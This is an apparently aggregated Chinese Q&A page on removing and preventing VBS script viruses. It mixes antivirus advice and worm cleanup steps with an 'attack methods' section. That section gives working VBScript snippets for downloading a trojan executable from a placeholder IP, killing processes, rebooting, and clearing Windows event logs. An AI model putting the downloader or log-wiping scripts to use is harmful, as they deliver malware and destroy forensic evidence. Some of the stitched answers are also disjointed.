vbs腳本病毒專殺
㈠ 電腦中了vbs病毒怎麼解決
1、打開計算機的安全衛士,在頁面上方的菜單欄中可見「木馬查殺」。
4、清除之後電腦就可以正常使用了。
㈡ VBS文件是病毒的文件嗎怎麼殺呢
VBS文件是腳本文件,也是一種可執行程序,不一定是病毒.
如果不放心,安裝一款專業殺毒軟體查殺即可.比如:金山毒霸2011
㈢ vbs病毒怎麼查殺
您好
1,VBS腳本病毒是使用VBScript編寫,以宏病毒和新歡樂時光病毒為典型代表的病毒。
2,其實VBS病毒很容易查殺,主要是此類病毒欺騙性強,一般殺毒軟體容易漏殺。
3,您可以到騰訊電腦管家官網下載一個電腦管家。
4,然後使用電腦管家——殺毒——全盤查殺即可,電腦管家擁有2大雲殺毒引擎,可以根據雲鑒定和微特徵檢測出電腦中隱藏的木馬病毒進行查殺。
如果還有其他疑問和問題,歡迎再次來電腦管家企業平台進行提問,我們將盡全力為您解答疑難
㈣ 中了vbs病毒請求幫助!!
vbs腳本病毒是個很N的類型,殺毒軟體對其只有查殺卻沒修復。要徹底修復,你得對VBS腳本解密(有些),但解密後,如果你看不懂那些命令,像那些注冊表的更改,在你沒備份的情況下是很難全改過來的,還有這些病毒通常還會在system創建svchost.exe腳本宿主(文件名不一定,你也別見svchost.exe就刪)。還有如果它修改了文件關聯,在已經刪除病毒的情況下,運行cmd
使用ftype命令來恢復bat的關聯,使用批處理來恢復其餘文件。
㈤ VBS腳本病毒的簡介
網路的流行,讓我們的世界變得更加美好,但它也有讓人不愉快的時候。當您收到一封主題為「I Love You」的郵件,用興奮得幾乎快發抖的滑鼠去點擊附件的時候;當您瀏覽一個信任的網站之後,發現打開每個文件夾的速度非常慢的時候,您是否察覺病毒已經闖進了您的世界呢?2000年5月4日歐美爆發的「宏病毒」網路蠕蟲病毒。由於通過電子郵件系統傳播,宏病毒在短短幾天內狂襲全球數百萬計的電腦。微軟、Intel等在內的眾多大型企業網路系統癱瘓,全球經濟損失達幾十億美元。而2002上半年爆發的新歡樂時光病毒至今都讓廣大電腦用戶更是苦不堪言。
上面提及的兩個病毒最大的一個共同特點是:使用VBScript編寫。下面我們就來逐一對VBS腳本病毒的各個方面加以分析:
㈥ VBS腳本病毒的攻擊方法
.文件下載(無回顯)
echo iLocal = LCase(WScript.Arguments(1)) >iget.vbe
echo iRemote = LCase(WScript.Arguments(0)) >>iget.vbe
echo Set xPost = createObject("Microsoft.XMLHTTP") >>iget.vbe
echo xPost.Open "GET",iRemote,0 >>iget.vbe
echo xPost.Send() >>iget.vbe
echo Set sGet = createObject("ADODB.Stream") >>iget.vbe
echo sGet.Mode = 3 >>iget.vbe
echo sGet.Type = 1 >>iget.vbe
echo sGet.Open() >>iget.vbe
echo sGet.Write(xPost.responseBody) >>iget.vbe
echo sGet.SaveToFile iLocal,2 >>iget.vbe 用法: cscript hget.vbs http://111.111.111.111/muma.exe muma.exe
2.列舉進程
@echo for each ps in getobject _ >ps.vbs
@echo ("winmgmts:\\.\root\cimv2:win32_process").instances_ >>ps.vbs
@echo wscript.echo ps.handle^&vbtab^&ps.name^&vbtab^&ps.executablepath:next >>ps.vbs 用法:cscript ps.vbs
3.終止進程
@echo for each ps in getobject _ >pskill.vbs
@echo ("winmgmts:\\.\root\cimv2:win32_process").instances_ >>pskill.vbs
@echo if ps.handle=wscript.arguments(0) then wscript.echo ps.terminate:end if:next >>pskill.vbs 用法:cscript pskill.vbs pid
4.重啟系統
@echo for each os in getobject _ >reboot.vbs
@echo ("winmgmts:!\\.\root\cimv2:win32_operatingsystem").instances_ >>reboot.vbs
@echo os.win32shutdown(2):next >>reboot.vbs 用法:cscript reboot.vbs5.利用腳本編程刪除日誌strComputer= "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate,(Backup)}!\\" & _
strComputer & "\root\cimv2")
dim mylogs(3)
mylogs(1)="application"
mylogs(2)="system"
mylogs(3)="security"
for Each logs in mylogs
Set colLogFiles=objWMIService.ExecQuery _
("Select * from Win32_NTEventLogFile where LogFileName='"&logs&"'")
For Each objLogfile in colLogFiles
objLogFile.ClearEventLog()
Next
next將上面的代碼保存為cleanevent.vbs文件即可。在上面的代碼中,首先獲得object對象,然後利用其clearEventLog()方法刪除日誌。建立一個數組,application,security,system,如果還有其他日誌也可以加入數組。然後用一個for循環,刪除數組中的每一個元素,即各個日誌。
㈦ 怎麼才能根除U盤「.vbs」病毒
VBS病毒是用VB
Script編寫而成,該腳本語言功能非常強大,它們利用Windows系統的開放性特點,通過調用一些現成的Windows對象、組件,可以直接對文件系統、注冊表等進行控制,功能非常強大。應該說病毒就是一種思想,但是這種思想在用VBS實現時變得極其容易。VBS腳本病毒具有如下幾個特點:
編寫簡單、破壞力大、感染力強、傳播范圍廣、變種多、欺騙性強;可以通過通過Email附件傳播;通過區域網共享傳播;通過感染htm、asp、jsp、php等網頁文件傳播;通過IRC聊天通道傳播;
如何預防和解除vbs腳本病毒
針對以上提到的VBS腳本病毒的弱點,筆者提出如下集中防範措施:
1)禁用文件系統對象FileSystemObject
方法:用regsvr32
scrrun.dll
/u這條命令就可以禁止文件系統對象。其中regsvr32是Windows\System下的可執行文件。或者直接查找scrrun.dll文件刪除或者改名。
還有一種方法就是在注冊表中HKEY_CLASSES_ROOT\CLSID\下找到一個主鍵{0D43FE01-F093-11CF-8940-00A0C9054228}的項,咔嚓即可。
2)卸載Windows
Scripting
Host
在Windows
98中(NT
4.0以上同理),打開[控制面板]→[添加/刪除程序]→[Windows安裝程序]→[附件],取消「Windows
Scripting
Host」一項。
和上面的方法一樣,在注冊表中HKEY_CLASSES_ROOT\CLSID\下找到一個主鍵{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}的項,咔嚓。
3)刪除VBS、VBE、JS、JSE文件後綴名與應用程序的映射
點擊[我的電腦]→[查看]→[文件夾選項]→[文件類型],然後刪除VBS、VBE、JS、JSE文件後綴名與應用程序的映射。
4)在Windows目錄中,找到WScript.exe,更改名稱或者刪除,如果你覺得以後有機會用到的話,最好更改名稱好了,當然以後也可以重新裝上。
5)要徹底防治VBS網路蠕蟲病毒,還需設置一下你的瀏覽器。我們首先打開瀏覽器,單擊菜單欄里「Internet
選項」安全選項卡里的[自定義級別]按鈕。把「ActiveX控制項及插件」的一切設為禁用,這樣就不怕了。呵呵,譬如新歡樂時光的那個ActiveX組件如果不能運行,網路傳播這項功能就玩完了。
6)禁止OE的自動收發郵件功能
7)由於蠕蟲病毒大多利用文件擴展名作文章,所以要防範它就不要隱藏系統中已知文件類型的擴展名。Windows默認的是「隱藏已知文件類型的擴展名稱」,將其修改為顯示所有文件類型的擴展名稱。
8)將系統的網路連接的安全級別設置至少為「中等」,它可以在一定程度上預防某些有害的Java程序或者某些ActiveX組件對計算機的侵害。
9)最後就是使用殺毒軟體。
10)可以使用這些工具進行查殺:
http://www.tmxy.net/qt/auto.htm
㈧ 支招殺.vbs病毒
worm.vbs病毒行為:
1、病毒運行後衍生的病毒文件:
%system32%\systeminit.exe
%system32%\winsystem.exe
%system32%\wininit.exe
X:\kerneldrive.exe
X:\autorun.inf
(其中X表示相應的盤符,不過移動盤根目錄下的病毒文件為handydriver.exe與autorun.inf)
worm.vbs病毒清除方案:
1、從正常電腦上拷貝任務管理器taskmgr.exe與cmd.exe文件到中毒電腦上。
2、結束病毒進程wininit.exe:
直接運行cmd.exe輸入命令tasklist查看進程列表,輸入taskkill
/pid
xxx結束病毒進程。(xxx表示病毒進程對應的pid號)
3、運行"gpedit.msc"打開組策略:
恢復「文件夾選項」,按步驟執行:
用戶配置-管理模板-Windows組件-WIindows資源管理器-從「工具」菜單刪除「文件夾選項」菜單-已禁用-確定。
恢復「任務管理器」,按步驟執行:
用戶配置-管理模板-系統-Ctrl+Alt+Del選項-刪除「任務管理器」-已禁用-確定。
4、用正常的taskgmr.exe與cmd.exe文件覆蓋%system32%下被病毒替換的taskmgr.exe與cmd.exe文件。
5、顯示隱藏的病毒文件,按步驟執行:
我的電腦-菜單欄-工具-文件夾選項-查看-勾去「隱藏受保護的操作系統文件(推薦)」-勾選「顯示所有文件和文件夾」-確定。
6、刪除病毒文件:
%system32%\systeminit.exe
%system32%\winsystem.exe
%system32%\wininit.exe
X:\kerneldrive.exe
X:\autorun.inf
(注意:刪除病毒文件時,千萬不要雙擊打開盤符以免激活病毒,可以通過地址欄或資源管理器進入相應盤符。)
7、分別以關鍵字systeminit.exe,winsystem.exe,wininit.exe,kerneldrive.exe,handydriver.exe搜索注冊表,刪除相應鍵值。最後建議用魔法兔子進行垃圾清理